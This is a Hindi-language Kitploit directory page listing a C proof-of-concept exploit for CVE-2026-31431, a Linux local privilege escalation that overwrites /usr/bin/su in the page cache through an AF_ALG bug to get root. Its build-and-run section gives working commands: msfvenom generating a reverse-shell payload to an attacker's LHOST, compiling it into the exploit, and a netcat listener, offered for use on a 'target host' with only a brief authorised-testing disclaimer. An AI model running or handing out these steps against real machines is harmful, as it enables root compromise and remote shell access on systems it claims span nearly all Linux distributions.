Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-31431 — CVE-2026-31431 के लिए C PoC, एक अन-प्रिविलेज्ड Linux LPE जो AF_ALG पेज कैश भ्रष्टाचार का फायदा उठाकर /usr/bin/su को ओवरराइट करता है और रूट प्राप्त करता है। | Kitploit
उपकरण/GitHubGitHub/mcub3/cve-2026-31431
विशेषाधिकार वृद्धिशोषण फ्रेमवर्कभेद्यता विश्लेषणशोषणपेलोड डेवलपमेंटबाइनरी शोषण
GitHubmcub3/cve-2026-31431

CVE-2026-31431

CVE-2026-31431 के लिए C PoC, एक अन-प्रिविलेज्ड Linux LPE जो AF_ALG पेज कैश भ्रष्टाचार का फायदा उठाकर /usr/bin/su को ओवरराइट करता है और रूट प्राप्त करता है।

रिपॉजिटरी देखें
3 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2026-31431 (कॉपी फेल) — C PoC

किसी भी पठनीय फ़ाइल के पेज कैश में AF_ALG (कर्नेल 4.14 → 2026 की शुरुआत) में एक लॉजिक बग के माध्यम से 4 नियंत्रित बाइट्स लिखकर साधारण अनप्रिविलेज्ड LPE।

/usr/bin/su को मेमोरी में दूषित करें, फिर इसे चलाएँ → रूट।

एक्सप्लॉइट स्क्रीनशॉट

बिल्ड और रन

root@kitploit:~
# 1. एक ELF पेलोड जनरेट करें (रिवर्स शेल उदाहरण)
msfvenom -p linux/x86/shell_reverse_tcp LHOST=<LHOST> LPORT=<LPORT> PrependSetuid=true \
    PrependSetgid=true -f elf -a x86 --platform linux -o payload_x86

# 2. कंपाइल करें (स्टैटिक, स्ट्रिप्ड, पेलोड .incbin के माध्यम से एम्बेडेड)
gcc -m32 -static -Wl,--strip-all -DPAYLOAD_FILE=payload_x86 -o copy_fail_x86 copy_fail.c

# 3. पहले लिसनर शुरू करें (nc -lvp <LPORT>), फिर टार्गेट होस्ट पर एक्सप्लॉइट चलाएँ
./copy_fail_x86

मुख्य विवरण

• CVE: CVE-2026-31431 • CVSS: 7.8 • फिक्स: कमिट a664bf3d603d

• लगभग सभी Linux डिस्ट्रो 2017–2026 पर काम करता है (कंटेनर सहित)।

• तकनीक: /usr/bin/su को O_RDONLY से खोलता है, VFS को बायपास करते हुए सीधे पेज कैश में एक क्राफ्टेड पेलोड को स्प्लाइस करने के लिए AEAD इन-प्लेस डिक्रिप्शन का दुरुपयोग करता है।

• मूल डिस्क्लोज़र और 732-बाइट Python PoC → https://copy.fail

लाइसेंस

MIT – देखें LICENSE। केवल शैक्षिक / अधिकृत परीक्षण के लिए। अपने जोखिम पर उपयोग करें।

टूल डाउनलोड करें